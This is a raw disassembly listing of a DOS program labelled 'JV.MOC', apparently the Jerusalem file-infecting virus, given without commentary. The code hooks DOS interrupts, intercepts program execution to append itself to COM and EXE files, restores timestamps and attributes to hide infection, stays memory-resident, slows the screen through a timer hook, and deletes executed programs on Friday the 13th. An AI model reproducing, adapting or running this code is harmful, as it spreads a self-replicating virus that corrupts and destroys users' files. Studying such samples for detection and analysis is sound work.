+0000:0006 7344 JAE X004C
+0000:0008 6F73 JG X007D
+0000:000A 0001 ADD [BX+DI],AL
+0000:000C BD1700 MOV BP,0017H
+0000:000F 0000 ADD [BX+SI],AL
+0000:0011 06 PUSH ES
+0000:0012 00A5FE00 ADD [DI+Y00FEH],AH
+0000:0016 F016 LOCK PUSH SS
+0000:0018 17 POP SS
+0000:0019 7702 JA X001D
+0000:001B BF053D MOV DI,03D05H
+0000:001E 0CFB OR AL,0FBH
+0000:0020 7D00 JGE X0022
+0000:0022 0000 X0022: ADD [BX+SI],AL
+0000:0024 0000 ADD [BX+SI],AL
+0000:0026 0000 ADD [BX+SI],AL
+0000:0028 0000 ADD [BX+SI],AL
+0000:002A 0000 ADD [BX+SI],AL
+0000:002C 0000 ADD [BX+SI],AL
+0000:002E E8062A CALL X2A37
+0000:0031 B10D MOV CL,0DH
+0000:0033 800000 ADD BYTE PTR [BX+SI],00H
+0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL
+0000:003A 0D5C00 OR AX,005CH
+0000:003D B10D MOV CL,0DH
+0000:003F 6C00 JL X0041
+0000:0041 B10D X0041: MOV CL,0DH
+0000:0043 0004 ADD [SI],AL
+0000:0045 5F POP DI
+0000:0046 0F POP CS
+0000:0047 B400 MOV AH,00H
+0000:0049 C1 RET ; INTRASEGMENT
+0000:004A 0D00F0 X004A: OR AX,0F000H
+0000:004D 06 PUSH ES
+0000:004E 004D5A ADD [DI+05AH],CL
+0000:0051 2000 AND [BX+SI],AL
+0000:0053 1000 ADC [BX+SI],AL
+0000:0055 1900 SBB [BX+SI],AX
+0000:0057 0800 OR [BX+SI],AL
+0000:0059 7500 JNZ X005B
+0000:005B 7500 X005B: JNZ X005D
+0000:005D 6901 X005D: JNS X0060
+0000:005F 1007 ADC [BX],AL
+0000:0061 8419 TEST BL,[BX+DI]
+0000:0063 C500 LDS AX,[BX+SI]
+0000:0065 6901 JNS X0068
+0000:0067 1C00 SBB AL,00H
+0000:0069 0000 ADD [BX+SI],AL
+0000:006B 4C X006B: DEC SP
+0000:006C B000 MOV AL,00H
+0000:006E CD21 INT 021H
+0000:0070 050020 ADD AX,02000H
+0000:0073 0037 ADD [BX],DH
+
+"JV.MOC" PAGE 0002
+
+0000:0075 121C ADC BL,[SI]
+0000:0077 0100 ADD [BX+SI],AX
+0000:0079 0210 ADD DL,[BX+SI]
+0000:007B 0010 ADD [BX+SI],DL
+0000:007D 17 X007D: POP SS
+0000:007E 0000 ADD [BX+SI],AL
+0000:0080 53 PUSH BX
+0000:0081 61E8 JNO X006B
+0000:0083 38434F CMP [BP+DI+04FH],AL
+0000:0086 4D DEC BP
+0000:0087 4D DEC BP
+0000:0088 41 INC CX
+0000:0089 4E DEC SI
+0000:008A 44 INC SP
+0000:008B 2E43 INC BX
+0000:008D 4F DEC DI
+0000:008E 4D DEC BP
+0000:008F 0100 ADD [BX+SI],AX
+0000:0091 0000 ADD [BX+SI],AL
+0000:0093 0000 ADD [BX+SI],AL
+0000:0095 FC X0095: CLD
+0000:0096 B4E0 MOV AH,0E0H
+0000:0098 CD21 INT 021H
+0000:009A 80FCE0 CMP AH,0E0H
+0000:009D 7316 JAE X00B5
+0000:009F 80FC03 CMP AH,03H
+0000:00A2 7211 JB X00B5
+0000:00A4 B4DD MOV AH,0DDH
+0000:00A6 BF0001 MOV DI,0100H
+0000:00A9 BE1007 MOV SI,0710H
+0000:00AC 03F7 ADD SI,DI
+0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H]
+0000:00B3 CD21 INT 021H
+0000:00B5 8CC8 X00B5: MOV AX,CS
+0000:00B7 051000 ADD AX,0010H
+0000:00BA 8ED0 MOV SS,AX
+0000:00BC BC0007 MOV SP,0700H
+0000:00BF 50 PUSH AX
+0000:00C0 B8C500 MOV AX,00C5H
+0000:00C3 50 PUSH AX
+0000:00C4 CB RET ; INTERSEGMENT
+0000:00C5 FC X00C5: CLD
+0000:00C6 06 PUSH ES
+0000:00C7 2E8C063100 MOV CS:[Y0031H],ES
+0000:00CC 2E8C063900 MOV CS:[Y0039H],ES
+0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES
+0000:00D6 2E8C064100 MOV CS:[Y0041H],ES
+0000:00DB 8CC0 MOV AX,ES
+0000:00DD 051000 ADD AX,0010H
+0000:00E0 2E01064900 ADD CS:[Y0049H],AX
+0000:00E5 2E01064500 ADD CS:[Y0045H],AX
+0000:00EA B4E0 MOV AH,0E0H
+0000:00EC CD21 INT 021H
+0000:00EE 80FCE0 CMP AH,0E0H
+0000:00F1 7313 JAE X0106
+0000:00F3 80FC03 CMP AH,03H
+
+"JV.MOC" PAGE 0003
+
+0000:00F6 07 POP ES
+0000:00F7 2E8E164500 MOV SS,CS:[Y0045H]
+0000:00FC 2E8B264300 MOV SP,CS:[Y0043H]
+0000:0101 2EFF2E4700 JMP CS:[Y0047H]
+0000:0106 33C0 X0106: XOR AX,AX
+0000:0108 8EC0 MOV ES,AX
+0000:010A 26A1FC03 MOV AX,ES:Y03FCH
+0000:010E 2EA34B00 MOV CS:Y004BH,AX
+0000:0112 26A0FE03 MOV AL,ES:Y03FEH
+0000:0116 2EA24D00 MOV CS:Y004DH,AL
+0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H
+0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH
+0000:0127 58 POP AX
+0000:0128 051000 ADD AX,0010H
+0000:012B 8EC0 MOV ES,AX
+0000:012D 0E PUSH CS
+0000:012E 1F POP DS
+0000:012F B91007 MOV CX,0710H
+0000:0132 D1E9 SHR CX,1
+0000:0134 33F6 XOR SI,SI
+0000:0136 8BFE MOV DI,SI
+0000:0138 06 PUSH ES
+0000:0139 B84201 MOV AX,0142H
+0000:013C 50 PUSH AX
+0000:013D EAFC030000 JMP X0000_03FC
+0000:0142 8CC8 MOV AX,CS
+0000:0144 8ED0 MOV SS,AX
+0000:0146 BC0007 MOV SP,0700H
+0000:0149 33C0 XOR AX,AX
+0000:014B 8ED8 MOV DS,AX
+0000:014D 2EA14B00 MOV AX,CS:Y004BH
+0000:0151 A3FC03 MOV Y03FCH,AX
+0000:0154 2EA04D00 MOV AL,CS:Y004DH
+0000:0158 A2FE03 MOV Y03FEH,AL
+0000:015B 8BDC MOV BX,SP
+0000:015D B104 MOV CL,04H
+0000:015F D3EB SHR BX,CL
+0000:0161 83C310 ADD BX,0010H
+0000:0164 2E891E3300 MOV CS:[Y0033H],BX
+0000:0169 B44A MOV AH,04AH
+0000:016B 2E8E063100 MOV ES,CS:[Y0031H]
+0000:0170 CD21 INT 021H
+0000:0172 B82135 MOV AX,03521H
+0000:0175 CD21 INT 021H
+0000:0177 2E891E1700 MOV CS:[Y0017H],BX
+0000:017C 2E8C061900 MOV CS:[Y0019H],ES
+0000:0181 0E PUSH CS
+0000:0182 1F POP DS
+0000:0183 BA5B02 MOV DX,025BH
+0000:0186 B82125 MOV AX,02521H
+0000:0189 CD21 INT 021H
+0000:018B 8E063100 MOV ES,[Y0031H]
+0000:018F 268E062C00 MOV ES,ES:[Y002CH]
+0000:0194 33FF XOR DI,DI
+0000:0196 B9FF7F MOV CX,07FFFH
+0000:0199 32C0 XOR AL,AL
+
+"JV.MOC" PAGE 0004
+
+0000:019B F2AE X019B: REPNE SCASB
+0000:019D 263805 CMP ES:[DI],AL
+0000:01A0 E0F9 LOOPNZ X019B
+0000:01A2 8BD7 MOV DX,DI
+0000:01A4 83C203 ADD DX,0003H
+0000:01A7 B8004B MOV AX,04B00H
+0000:01AA 06 PUSH ES
+0000:01AB 1F POP DS
+0000:01AC 0E PUSH CS
+0000:01AD 07 POP ES
+0000:01AE BB3500 MOV BX,0035H
+0000:01B1 1E PUSH DS
+0000:01B2 06 PUSH ES
+0000:01B3 50 PUSH AX
+0000:01B4 53 PUSH BX
+0000:01B5 51 PUSH CX
+0000:01B6 52 PUSH DX
+0000:01B7 B42A MOV AH,02AH
+0000:01B9 CD21 INT 021H
+0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H
+0000:01C1 81F9C307 CMP CX,07C3H
+0000:01C5 7430 JZ X01F7
+0000:01C7 3C05 CMP AL,05H
+0000:01C9 750D JNZ X01D8
+0000:01CB 80FA0D CMP DL,0DH
+0000:01CE 7508 JNZ X01D8
+0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH]
+0000:01D5 EB20 JMP X01F7
+0000:01D7 90 NOP
+0000:01D8 B80835 X01D8: MOV AX,03508H
+0000:01DB CD21 INT 021H
+0000:01DD 2E891E1300 MOV CS:[Y0013H],BX
+0000:01E2 2E8C061500 MOV CS:[Y0015H],ES
+0000:01E7 0E PUSH CS
+0000:01E8 1F POP DS
+0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H
+0000:01EF B80825 MOV AX,02508H
+0000:01F2 BA1E02 MOV DX,021EH
+0000:01F5 CD21 INT 021H
+0000:01F7 5A X01F7: POP DX
+0000:01F8 59 POP CX
+0000:01F9 5B POP BX
+0000:01FA 58 POP AX
+0000:01FB 07 POP ES
+0000:01FC 1F POP DS
+0000:01FD 9C PUSHF
+0000:01FE 2EFF1E1700 CALL CS:[Y0017H]
+0000:0203 1E PUSH DS
+0000:0204 07 POP ES
+0000:0205 B449 MOV AH,049H
+0000:0207 CD21 INT 021H
+0000:0209 B44D MOV AH,04DH
+0000:020B CD21 INT 021H
+0000:020D B431 MOV AH,031H
+0000:020F BA0006 MOV DX,0600H
+0000:0212 B104 MOV CL,04H
+
+"JV.MOC" PAGE 0005
+
+0000:0214 D3EA SHR DX,CL
+0000:0216 83C210 ADD DX,0010H
+0000:0219 CD21 INT 021H
+0000:021B 32C0 XOR AL,AL
+0000:021D CF IRET
+0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H
+0000:0224 7517 JNZ X023D
+0000:0226 50 PUSH AX
+0000:0227 53 PUSH BX
+0000:0228 51 PUSH CX
+0000:0229 52 PUSH DX
+0000:022A 55 PUSH BP
+0000:022B B80206 MOV AX,0602H
+0000:022E B787 MOV BH,087H
+0000:0230 B90505 MOV CX,0505H
+0000:0233 BA1010 MOV DX,01010H
+0000:0236 CD10 INT 010H
+0000:0238 5D POP BP
+0000:0239 5A POP DX
+0000:023A 59 POP CX
+0000:023B 5B POP BX
+0000:023C 58 POP AX
+0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH]
+0000:0242 7512 JNZ X0256
+0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H
+0000:024B 50 PUSH AX
+0000:024C 51 PUSH CX
+0000:024D 56 PUSH SI
+0000:024E B90140 MOV CX,04001H
+0000:0251 F3AC REPE LODSB
+0000:0253 5E POP SI
+0000:0254 59 POP CX
+0000:0255 58 POP AX
+0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H]
+0000:025B 9C X025B: PUSHF
+0000:025C 80FCE0 CMP AH,0E0H
+0000:025F 7505 JNZ X0266
+0000:0261 B80003 MOV AX,0300H
+0000:0264 9D POPF
+0000:0265 CF IRET
+0000:0266 80FCDD X0266: CMP AH,0DDH
+0000:0269 7413 JZ X027E
+0000:026B 80FCDE CMP AH,0DEH
+0000:026E 7428 JZ X0298
+0000:0270 3D004B CMP AX,04B00H
+0000:0273 7503 JNZ X0278
+0000:0275 E9B400 JMP X032C
+0000:0278 9D X0278: POPF
+0000:0279 2EFF2E1700 JMP CS:[Y0017H]
+0000:027E 58 X027E: POP AX
+0000:027F 58 POP AX
+0000:0280 B80001 MOV AX,0100H
+0000:0283 2EA30A00 MOV CS:Y000AH,AX
+0000:0287 58 POP AX
+0000:0288 2EA30C00 MOV CS:Y000CH,AX
+0000:028C F3A4 REPE MOVSB
+
+"JV.MOC" PAGE 0006
+
+0000:028E 9D POPF
+0000:028F 2EA10F00 MOV AX,CS:Y000FH
+0000:0293 2EFF2E0A00 JMP CS:[Y000AH]
+0000:0298 83C406 X0298: ADD SP,0006H
+0000:029B 9D POPF
+0000:029C 8CC8 MOV AX,CS
+0000:029E 8ED0 MOV SS,AX
+0000:02A0 BC1007 MOV SP,0710H
+0000:02A3 06 PUSH ES
+0000:02A4 06 PUSH ES
+0000:02A5 33FF XOR DI,DI
+0000:02A7 0E PUSH CS
+0000:02A8 07 POP ES
+0000:02A9 B91000 MOV CX,0010H
+0000:02AC 8BF3 MOV SI,BX
+0000:02AE BF2100 MOV DI,0021H
+0000:02B1 F3A4 REPE MOVSB
+0000:02B3 8CD8 MOV AX,DS
+0000:02B5 8EC0 MOV ES,AX
+0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH]
+0000:02BC 2E03062B00 ADD AX,CS:[Y002BH]
+0000:02C1 83D200 ADC DX,0000H
+0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH]
+0000:02C9 8ED8 MOV DS,AX
+0000:02CB 8BF2 MOV SI,DX
+0000:02CD 8BFA MOV DI,DX
+0000:02CF 8CC5 MOV BP,ES
+0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH]
+0000:02D6 0BDB OR BX,BX
+0000:02D8 7413 JZ X02ED
+0000:02DA B90080 X02DA: MOV CX,08000H
+0000:02DD F3A5 REPE MOVSW
+0000:02DF 050010 ADD AX,01000H
+0000:02E2 81C50010 ADD BP,01000H
+0000:02E6 8ED8 MOV DS,AX
+0000:02E8 8EC5 MOV ES,BP
+0000:02EA 4B DEC BX
+0000:02EB 75ED JNZ X02DA
+0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH]
+0000:02F2 F3A4 REPE MOVSB
+0000:02F4 58 POP AX
+0000:02F5 50 PUSH AX
+0000:02F6 051000 ADD AX,0010H
+0000:02F9 2E01062900 ADD CS:[Y0029H],AX
+0000:02FE 2E01062500 ADD CS:[Y0025H],AX
+0000:0303 2EA12100 MOV AX,CS:Y0021H
+0000:0307 1F POP DS
+0000:0308 07 POP ES
+0000:0309 2E8E162900 MOV SS,CS:[Y0029H]
+0000:030E 2E8B262700 MOV SP,CS:[Y0027H]
+0000:0313 2EFF2E2300 JMP CS:[Y0023H]
+0000:0318 33C9 X0318: XOR CX,CX
+0000:031A B80143 MOV AX,04301H
+0000:031D CD21 INT 021H
+0000:031F B441 MOV AH,041H
+0000:0321 CD21 INT 021H
+
+"JV.MOC" PAGE 0007
+
+0000:0323 B8004B MOV AX,04B00H
+0000:0326 9D POPF
+0000:0327 2EFF2E1700 JMP CS:[Y0017H]
+0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H
+0000:0332 74E4 JZ X0318
+0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH
+0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H
+0000:0342 2E89168000 MOV CS:[Y0080H],DX
+0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS
+0000:034C 50 PUSH AX
+0000:034D 53 PUSH BX
+0000:034E 51 PUSH CX
+0000:034F 52 PUSH DX
+0000:0350 56 PUSH SI
+0000:0351 57 PUSH DI
+0000:0352 1E PUSH DS
+0000:0353 06 PUSH ES
+0000:0354 FC CLD
+0000:0355 8BFA MOV DI,DX
+0000:0357 32D2 XOR DL,DL
+0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH
+0000:035D 7505 JNZ X0364
+0000:035F 8A15 MOV DL,[DI]
+0000:0361 80E21F AND DL,01FH
+0000:0364 B436 X0364: MOV AH,036H
+0000:0366 CD21 INT 021H
+0000:0368 3DFFFF CMP AX,0FFFFH
+0000:036B 7503 JNZ X0370
+0000:036D E97702 X036D: JMP X05E7
+0000:0370 F7E3 X0370: MUL BX
+0000:0372 F7E1 MUL CX
+0000:0374 0BD2 OR DX,DX
+0000:0376 7505 JNZ X037D
+0000:0378 3D1007 CMP AX,0710H
+0000:037B 72F0 JB X036D
+0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H]
+0000:0382 1E PUSH DS
+0000:0383 07 POP ES
+0000:0384 32C0 XOR AL,AL
+0000:0386 B94100 MOV CX,0041H
+0000:0389 F2AE REPNE SCASB
+0000:038B 2E8B368000 MOV SI,CS:[Y0080H]
+0000:0390 8A04 X0390: MOV AL,[SI]
+0000:0392 0AC0 OR AL,AL
+0000:0394 740E JZ X03A4
+0000:0396 3C61 CMP AL,061H
+0000:0398 7207 JB X03A1
+0000:039A 3C7A CMP AL,07AH
+0000:039C 7703 JA X03A1
+0000:039E 802C20 SUB BYTE PTR [SI],020H
+0000:03A1 46 X03A1: INC SI
+0000:03A2 EBEC JMP X0390
+0000:03A4 B90B00 X03A4: MOV CX,000BH
+0000:03A7 2BF1 SUB SI,CX
+0000:03A9 BF8400 MOV DI,0084H
+0000:03AC 0E PUSH CS
+
+"JV.MOC" PAGE 0008
+
+0000:03AD 07 POP ES
+0000:03AE B90B00 MOV CX,000BH
+0000:03B1 F3A6 REPE CMPSB
+0000:03B3 7503 JNZ X03B8
+0000:03B5 E92F02 JMP X05E7
+0000:03B8 B80043 X03B8: MOV AX,04300H
+0000:03BB CD21 INT 021H
+0000:03BD 7205 JB X03C4
+0000:03BF 2E890E7200 MOV CS:[Y0072H],CX
+0000:03C4 7225 X03C4: JB X03EB
+0000:03C6 32C0 XOR AL,AL
+0000:03C8 2EA24E00 MOV CS:Y004EH,AL
+0000:03CC 1E PUSH DS
+0000:03CD 07 POP ES
+0000:03CE 8BFA MOV DI,DX
+0000:03D0 B94100 MOV CX,0041H
+0000:03D3 F2AE REPNE SCASB
+0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH
+0000:03D9 740B JZ X03E6
+0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH
+0000:03DF 7405 JZ X03E6
+0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH]
+0000:03E6 B8003D X03E6: MOV AX,03D00H
+0000:03E9 CD21 INT 021H
+0000:03EB 725A X03EB: JB X0447
+0000:03ED 2EA37000 MOV CS:Y0070H,AX
+0000:03F1 8BD8 MOV BX,AX
+0000:03F3 B80242 MOV AX,04202H
+0000:03F6 B9FFFF MOV CX,0FFFFH
+0000:03F9 BAFBFF MOV DX,0FFFBH
+0000:03FC CD21 X03FC: INT 021H
+0000:03FE 72EB JB X03EB
+0000:0400 050500 ADD AX,0005H
+0000:0403 2EA31100 MOV CS:Y0011H,AX
+0000:0407 B90500 MOV CX,0005H
+0000:040A BA6B00 MOV DX,006BH
+0000:040D 8CC8 MOV AX,CS
+0000:040F 8ED8 MOV DS,AX
+0000:0411 8EC0 MOV ES,AX
+0000:0413 B43F MOV AH,03FH
+0000:0415 CD21 INT 021H
+0000:0417 8BFA MOV DI,DX
+0000:0419 BE0500 MOV SI,0005H
+0000:041C F3A6 REPE CMPSB
+0000:041E 7507 JNZ X0427
+0000:0420 B43E MOV AH,03EH
+0000:0422 CD21 INT 021H
+0000:0424 E9C001 JMP X05E7
+0000:0427 B82435 X0427: MOV AX,03524H
+0000:042A CD21 INT 021H
+0000:042C 891E1B00 MOV [Y001BH],BX
+0000:0430 8C061D00 MOV [Y001DH],ES
+0000:0434 BA1B02 MOV DX,021BH
+0000:0437 B82425 MOV AX,02524H
+0000:043A CD21 INT 021H
+0000:043C C5168000 LDS DX,[Y0080H]
+
+"JV.MOC" PAGE 0009
+
+0000:0440 33C9 XOR CX,CX
+0000:0442 B80143 MOV AX,04301H
+0000:0445 CD21 INT 021H
+0000:0447 723B X0447: JB X0484
+0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H]
+0000:044E B43E MOV AH,03EH
+0000:0450 CD21 INT 021H
+0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH
+0000:0459 B8023D MOV AX,03D02H
+0000:045C CD21 INT 021H
+0000:045E 7224 JB X0484
+0000:0460 2EA37000 MOV CS:Y0070H,AX
+0000:0464 8CC8 MOV AX,CS
+0000:0466 8ED8 MOV DS,AX
+0000:0468 8EC0 MOV ES,AX
+0000:046A 8B1E7000 MOV BX,[Y0070H]
+0000:046E B80057 MOV AX,05700H
+0000:0471 CD21 INT 021H
+0000:0473 89167400 MOV [Y0074H],DX
+0000:0477 890E7600 MOV [Y0076H],CX
+0000:047B B80042 MOV AX,04200H
+0000:047E 33C9 XOR CX,CX
+0000:0480 8BD1 MOV DX,CX
+0000:0482 CD21 INT 021H
+0000:0484 723D X0484: JB X04C3
+0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H
+0000:048B 7403 JZ X0490
+0000:048D EB57 JMP X04E6
+0000:048F 90 NOP
+0000:0490 BB0010 X0490: MOV BX,01000H
+0000:0493 B448 MOV AH,048H
+0000:0495 CD21 INT 021H
+0000:0497 730B JAE X04A4
+0000:0499 B43E MOV AH,03EH
+0000:049B 8B1E7000 MOV BX,[Y0070H]
+0000:049F CD21 INT 021H
+0000:04A1 E94301 JMP X05E7
+0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH]
+0000:04A8 8EC0 MOV ES,AX
+0000:04AA 33F6 XOR SI,SI
+0000:04AC 8BFE MOV DI,SI
+0000:04AE B91007 MOV CX,0710H
+0000:04B1 F3A4 REPE MOVSB
+0000:04B3 8BD7 MOV DX,DI
+0000:04B5 8B0E1100 MOV CX,[Y0011H]
+0000:04B9 8B1E7000 MOV BX,[Y0070H]
+0000:04BD 06 PUSH ES
+0000:04BE 1F POP DS
+0000:04BF B43F MOV AH,03FH
+0000:04C1 CD21 INT 021H
+0000:04C3 721C X04C3: JB X04E1
+0000:04C5 03F9 ADD DI,CX
+0000:04C7 33C9 XOR CX,CX
+0000:04C9 8BD1 MOV DX,CX
+0000:04CB B80042 MOV AX,04200H
+0000:04CE CD21 INT 021H
+
+"JV.MOC" PAGE 0010
+
+0000:04D0 BE0500 MOV SI,0005H
+0000:04D3 B90500 MOV CX,0005H
+0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT
+ R (SI)
+0000:04D9 8BCF MOV CX,DI
+0000:04DB 33D2 XOR DX,DX
+0000:04DD B440 MOV AH,040H
+0000:04DF CD21 INT 021H
+0000:04E1 720D X04E1: JB X04F0
+0000:04E3 E9BC00 JMP X05A2
+0000:04E6 B91C00 X04E6: MOV CX,001CH
+0000:04E9 BA4F00 MOV DX,004FH
+0000:04EC B43F MOV AH,03FH
+0000:04EE CD21 INT 021H
+0000:04F0 724A X04F0: JB X053C
+0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H
+0000:04F8 A15D00 MOV AX,Y005DH
+0000:04FB A34500 MOV Y0045H,AX
+0000:04FE A15F00 MOV AX,Y005FH
+0000:0501 A34300 MOV Y0043H,AX
+0000:0504 A16300 MOV AX,Y0063H
+0000:0507 A34700 MOV Y0047H,AX
+0000:050A A16500 MOV AX,Y0065H
+0000:050D A34900 MOV Y0049H,AX
+0000:0510 A15300 MOV AX,Y0053H
+0000:0513 833E510000 CMP WORD PTR [Y0051H],0000H
+0000:0518 7401 JZ X051B
+0000:051A 48 DEC AX
+0000:051B F7267800 X051B: MUL WORD PTR [Y0078H]
+0000:051F 03065100 ADD AX,[Y0051H]
+0000:0523 83D200 ADC DX,0000H
+0000:0526 050F00 ADD AX,000FH
+0000:0529 83D200 ADC DX,0000H
+0000:052C 25F0FF AND AX,0FFF0H
+0000:052F A37C00 MOV Y007CH,AX
+0000:0532 89167E00 MOV [Y007EH],DX
+0000:0536 051007 ADD AX,0710H
+0000:0539 83D200 ADC DX,0000H
+0000:053C 723A X053C: JB X0578
+0000:053E F7367800 DIV WORD PTR [Y0078H]
+0000:0542 0BD2 OR DX,DX
+0000:0544 7401 JZ X0547
+0000:0546 40 INC AX
+0000:0547 A35300 X0547: MOV Y0053H,AX
+0000:054A 89165100 MOV [Y0051H],DX
+0000:054E A17C00 MOV AX,Y007CH
+0000:0551 8B167E00 MOV DX,[Y007EH]
+0000:0555 F7367A00 DIV WORD PTR [Y007AH]
+0000:0559 2B065700 SUB AX,[Y0057H]
+0000:055D A36500 MOV Y0065H,AX
+0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H
+0000:0566 A35D00 MOV Y005DH,AX
+0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H
+0000:056F 33C9 XOR CX,CX
+0000:0571 8BD1 MOV DX,CX
+0000:0573 B80042 MOV AX,04200H
+0000:0576 CD21 INT 021H
+
+"JV.MOC" PAGE 0011
+
+0000:0578 720A X0578: JB X0584
+0000:057A B91C00 MOV CX,001CH
+0000:057D BA4F00 MOV DX,004FH
+0000:0580 B440 MOV AH,040H
+0000:0582 CD21 INT 021H
+0000:0584 7211 X0584: JB X0597
+0000:0586 3BC1 CMP AX,CX
+0000:0588 7518 JNZ X05A2
+0000:058A 8B167C00 MOV DX,[Y007CH]
+0000:058E 8B0E7E00 MOV CX,[Y007EH]
+0000:0592 B80042 MOV AX,04200H
+0000:0595 CD21 INT 021H
+0000:0597 7209 X0597: JB X05A2
+0000:0599 33D2 XOR DX,DX
+0000:059B B91007 MOV CX,0710H
+0000:059E B440 MOV AH,040H
+0000:05A0 CD21 INT 021H
+0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H
+0000:05A8 7404 JZ X05AE
+0000:05AA B449 MOV AH,049H
+0000:05AC CD21 INT 021H
+0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH
+0000:05B4 7431 JZ X05E7
+0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H]
+0000:05BB 2E8B167400 MOV DX,CS:[Y0074H]
+0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H]
+0000:05C5 B80157 MOV AX,05701H
+0000:05C8 CD21 INT 021H
+0000:05CA B43E MOV AH,03EH
+0000:05CC CD21 INT 021H
+0000:05CE 2EC5168000 LDS DX,CS:[Y0080H]
+0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H]
+0000:05D8 B80143 MOV AX,04301H
+0000:05DB CD21 INT 021H
+0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH]
+0000:05E2 B82425 MOV AX,02524H
+0000:05E5 CD21 INT 021H
+0000:05E7 07 X05E7: POP ES
+0000:05E8 1F POP DS
+0000:05E9 5F POP DI
+0000:05EA 5E POP SI
+0000:05EB 5A POP DX
+0000:05EC 59 POP CX
+0000:05ED 5B POP BX
+0000:05EE 58 POP AX
+0000:05EF 9D POPF
+0000:05F0 2EFF2E1700 JMP CS:[Y0017H]
+0000:05F5 0000 X05F5: ADD [BX+SI],AL
+0000:05F7 0000 ADD [BX+SI],AL
+0000:05F9 0000 ADD [BX+SI],AL
+0000:05FB 0000 ADD [BX+SI],AL
+0000:05FD 0000 ADD [BX+SI],AL
+0000:05FF 004D00 ADD [DI+00H],CL
+0000:0602 000F ADD [BX],CL
+0000:0604 0000 ADD [BX+SI],AL
+0000:0606 0000 ADD [BX+SI],AL
+
+"JV.MOC" PAGE 0012
+
+0000:0608 0000 ADD [BX+SI],AL
+0000:060A 0000 ADD [BX+SI],AL
+0000:060C 0000 ADD [BX+SI],AL
+0000:060E 0000 ADD [BX+SI],AL
+0000:0610 CD20 INT 020H
+0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH
+0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID
+0000:0619 F02F LOCK DAS
+0000:061B 018E1E3C ADD [BP+Y03C1EH],CX
+0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX
+0000:0623 048E ADD AL,08EH
+0000:0625 1E PUSH DS
+0000:0626 8E1EFFFF MOV DS,[Y0FFFFH]
+0000:062A FFFF ??? DI
+0000:062C FFFF ??? DI
+0000:062E FFFF ??? DI
+0000:0630 FFFF ??? DI
+0000:0632 FFFF ??? DI
+0000:0634 FFFF ??? DI
+0000:0636 FFFF ??? DI
+0000:0638 FFFF ??? DI
+0000:063A FFFF ??? DI
+0000:063C 7C1F JL X065D
+0000:063E DE3E8D29 ESC 037H,[Y0298DH]
+0000:0642 1400 ADC AL,00H
+0000:0644 1800 SBB [BX+SI],AL
+0000:0646 F1 DB 0F1H
+0000:0647 1F POP DS
+0000:0648 FFFF ??? DI
+0000:064A FFFF ??? DI
+0000:064C 0000 ADD [BX+SI],AL
+0000:064E 0000 ADD [BX+SI],AL
+0000:0650 0000 ADD [BX+SI],AL
+0000:0652 0000 ADD [BX+SI],AL
+0000:0654 0000 ADD [BX+SI],AL
+0000:0656 0000 ADD [BX+SI],AL
+0000:0658 0000 ADD [BX+SI],AL
+0000:065A 0000 ADD [BX+SI],AL
+0000:065C 0000 ADD [BX+SI],AL
+0000:065E 0000 ADD [BX+SI],AL
+0000:0660 CD21 INT 021H
+0000:0662 CB RET ; INTERSEGMENT
+0000:0663 0000 X0663: ADD [BX+SI],AL
+0000:0665 0000 ADD [BX+SI],AL
+0000:0667 0000 ADD [BX+SI],AL
+0000:0669 0000 ADD [BX+SI],AL
+0000:066B 0000 ADD [BX+SI],AL
+0000:066D 2020 AND [BX+SI],AH
+0000:066F 2020 AND [BX+SI],AH
+0000:0671 2020 AND [BX+SI],AH
+0000:0673 2020 AND [BX+SI],AH
+0000:0675 2020 AND [BX+SI],AH
+0000:0677 2000 AND [BX+SI],AL
+0000:0679 0000 ADD [BX+SI],AL
+0000:067B 0000 ADD [BX+SI],AL
+0000:067D 2020 AND [BX+SI],AH
+
+"JV.MOC" PAGE 0013
+
+0000:067F 2020 AND [BX+SI],AH
+0000:0681 2020 AND [BX+SI],AH
+0000:0683 2020 AND [BX+SI],AH
+0000:0685 2020 AND [BX+SI],AH
+0000:0687 2000 AND [BX+SI],AL
+0000:0689 0000 ADD [BX+SI],AL
+0000:068B 0000 ADD [BX+SI],AL
